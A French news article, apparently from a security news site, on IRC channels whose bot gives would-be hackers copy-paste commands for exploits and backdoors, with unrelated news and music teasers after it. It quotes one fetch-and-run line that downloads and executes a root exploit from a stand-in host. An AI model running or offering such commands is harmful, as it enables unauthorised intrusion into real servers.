On connaissait les logiciels trouvés sur la toile qui permettaient
de casser un mot de passe, d'espionner, dans certaines conditions, un internaute.
Voici venir le chan IRC qui diffuse, à qui le souhaite, les méthodes,
exploits et backdoors permettant le piratage. En un seul clic le massacre peut
commencer. Par Damien Bancal
Ils s'appellent Piratax, Fr0z3nz, Stoopix, SlackWar3. Le point commun de ces
internautes, ainsi que de plusieurs centaines d'autres est de se retrouver sur
des chans IRC afin de récupérer des informations dédiées
au piratage de serveurs Internet. Culture informatique proche du zéro,
ils l'avouent eux-mêmes, ils n'ont jamais rien créé mais
ont tous le même rêve : devenir un grand hacker. Pour espérer
atteindre ce qui reste un éternel fantasme dans l'esprit d'une certaine
catégorie d'internautes, il faut accéder aux exploits. Pour cela
il y a deux contraintes : la première est de comprendre le code source
de l'exploit utilisé et de le modifier à sa convenance si besoin
est. La seconde est d'être capable d'utiliser un exploit publié
(compilé parfois) afin de s'ouvrir les portes d'un serveur ou d'un site
internet. Seulement aujourd'hui, il est possible de modifier une page web, ou
d'accéder à un serveur dédié, sans même bouger
le moindre petit neurone.
![]() |
Pièges automatisés
Sur l'un des chans IRC découvert, le bot, un robot permettant d'automatiser
certaines actions, est d'une gentillesse à toute épreuve. Selon
les commandes envoyées, il propose l'exploit correspondant au mot-clé
envoyé ainsi que les commandes à copier- coller pour utiliser
celui-ci. Pour ce faire, le pirate qui a mis en place ce lieu de discussion
particulier, a infiltré plusieurs serveurs web. Il y a placé des
exploits publics, et certains privés, baptisés des "0days",
qui permettent d'agir selon le mot-clé spécifié. "Ils
vont télécharger des versions compilées d'un exploit, il
ne reste plus qu'à l'exécuter, explique un utilisateur français.
Moi, ça me permet de tenir à jour la base de données dédiée
à la sécurité des clients de l'entreprise qui m'emploie."
L'effet est effectivement saisissant.
Les pirates tapent par exemple une commande " !uselib ". Le bot du
channel analyse dans sa base de données. Il recherche un exploit correspondant
à ce service. Il n'en n'a pas, il renvoie évidemment une erreur.
En revanche, dans le cas où il est en possession d'un exploit correspondant
à ce service, il renvoie une ligne qui ressemble à celle-là
: "wget www.sitepirate.com/0days/uselib; chmod 777 uselib ; ./uselib".
Celui-ci communique l'endroit où est stocké l'exploit ainsi que
la commande système pour le télécharger. Il permet de changer
les droits de l'exploit une fois téléchargé, et donc de
l'exécuter. Le pirate n'a donc plus qu'à copier cette ligne afin
de devenir root, comprenez l'administrateur de la machine ciblée.
![]() |
Le bot va nettement plus loin puisqu'il répond à
la commande " !backdoor", il permet, une fois l'exploit téléchargé
et exécuté, de refaire le même processus, cette fois avec
les privilèges administrateurs pour installer une backdoor, comprenez
une porte dérobée, afin de créer un accès sur la
machine piratée. Cet accès va lui permettre d'y revenir plus tard.
Cette backdoor est généralement en Perl ou compilée.
L'exemple "uselib" est assez probant, dans le sens où cet exploit
existe vraiment pour la librairie en question. Il est donc possible d'utiliser
l'exploit en 1 seconde en copiant les lignes données par le bot. Un accès
de Calife à la place du Calife et cela en à peine 4 secondes.
"Ce genre d'espace est un véritable nid à pirates,
explique John Jean, directeur de la société de sécurité
informatique "Wargan solutions". En effet, la plupart des personnes
exécutant ces binaires ne connaissent même pas le code source de
ceux-ci, et encore moins leur fonctionnement. Il se peut qu'en créant
un accès sur une machine, ils en créent également un à
celui qui met à disposition ces binaires. Du piratage ou accès
à un serveur à la portée de tous." Même
plus besoin de réfléchir à l'acte. Seul le résultat
compte. Une démocratisation du piratage qui risque d'entraîner
des vagues d'arrestations dans les chambrées de ces internautes qui rêvaient
tant d'être de grands pirates. "Avant, j'aidais les webmasters,
explique l'un d'eux, Je n'avais même pas de merci. Aujourd'hui, au
moins, je suis respecté". Le réveil risque d'être
violent !
![]() |
a>
Plus discret et plus intelligent, Trojan.Silentbanker ou le cheval de Troie qui ferait pâlir d´envie Ulysse et Jesse James.
Le constructeur finlandais Nokia va mettre en place, jeudi prochain, son offre de musique illimitée sur mobile.
Pour lutter mondialement contre les fraudes à la carte de paiement, Actimize se dote d´une nouvelle technologie d´analyse et acquiert les droits d´exploitation de données issues d´un consortium représentant des milliards de transactions.
Une nouvelle menace qui risque de s´amplifier dans les mois à venir : les faux anti-spyware. Ces attaques passaient jusqu´alors inaperçues. Aujourd´hui, elles prennent une tout autre dimension.
Les solutions antivirus ESET NOD32 et ESET Smart Security s´associent à Carbonite afin d´offrir à tout nouvel utilisateur ESET, la sauvegarde en ligne de leurs données pendant 1 an.
Dictao, éditeur de référence de produits logiciels pour les applications de dématérialisation des flux reposant sur la signature électronique, sera présent aux Assises de la Sécurité 2008, à Monaco.
La prévention contre les fuites de données de Websense est désormais disponible pour les postes de travail, avec une intégration à la passerelle de sécurité Internet.
Les spammeurs tentent de piéger les utilisateurs en les poussant à confirmer la validité de leur adresse e-mail.
Michael Calce, plus connu sous son pseudo de Mafiaboy, sort un livre sur son attaque qui avait bloqué CNN, Amazon et compagnie.
Près de 100 000 sites légitimes ont été touchés par l´une des plus importante attaque de cyber criminels. 1 000 serveurs concernés en France dont Tf1, Bouugues Telecom, ...
Une radio française, Fréquence 3, dépose plainte après la diffusion de jingles insultants sur son antenne. Un pirate est passé par là.
Le site Internet Muslim Massacre piraté par un hacktiviste. Le site extremistre est revenu après quelques heures de fermeture.
Le FBI n'a pas chaumé pour mettre la main sur le hacker des comptes mels de Sarah Palin. Le plaisantin serait le fils d'un député.
Trou noir pour le site web du CERN. Des pirates informatiques s'attaquent à l'accélérateur de particules.
Un internaute annonce être un pro du piratage. 24 heures après son passage sur un site Internet militaire... il se retrouve en prison.
Exclu: Le site Internet de jacklang.net se retrouve interdit au moins de 18 ans.
Pour lutter mondialement contre les fraudes à la carte de paiement, Actimize se dote d´une nouvelle technologie d´analyse et acquiert les droits d´exploitation de données issues d´un consortium représentant des milliards de transactions.
Les solutions antivirus ESET NOD32 et ESET Smart Security s´associent à Carbonite afin d´offrir à tout nouvel utilisateur ESET, la sauvegarde en ligne de leurs données pendant 1 an.
Dictao, éditeur de référence de produits logiciels pour les applications de dématérialisation des flux reposant sur la signature électronique, sera présent aux Assises de la Sécurité 2008, à Monaco.
La prévention contre les fuites de données de Websense est désormais disponible pour les postes de travail, avec une intégration à la passerelle de sécurité Internet.
Dans la série, bouges ton corps et la mise à jour de tes outils Internet. Louise Bourgoin, l’ancienne miss météo de Canal + … devenue actrice de cinéma, s’est fait démonter son petit site Internet par des pirates Kosovar. Les barbouilleurs n’ont exploité qu’un seul talent, celui de trouver des sites faillibles à une faille [...]
Onze ans de travail pour un film déjà culte ! Images choc et émotion. Une vraie décharge électrique de culture rock.Femme, artiste, poétesse, chanteuse, récitante, peintre, mère, militante, photographe? Patti Smith, pesonnalité exceptionnelle aux talents multiples, est une légende. Marraine du mouvement punk dans les années soixante-dix, elle est plus qu?une icône du rock : [...]
Azymuth est une légende de la musique brésilienne, adulé par nombres de fans qui traquent leurs vyniles de par le monde et sur ebay. Le groupe revient pour un nouvel album hommage à Herbie Hancock intitulé Butterfly et donnera deux concerts exceptionnels en France : Le 17 octobre à Bobigny / Canal 93 et le [...]
This is me par Demi Lovato et les Jonas Brothers sur Stars-buzz.com.CAMP ROCK raconte l?histoire d?une adolescente qui rêve de faire connaître ses chansons et d?une jeune superstar déçue par la musique. Ensemble, ils vont apprendre à croire en eux-mêmes et devenir qui ils veulent vraiment être. Depuis son plus jeune âge, Mitchie (Demi Lovato) veut [...]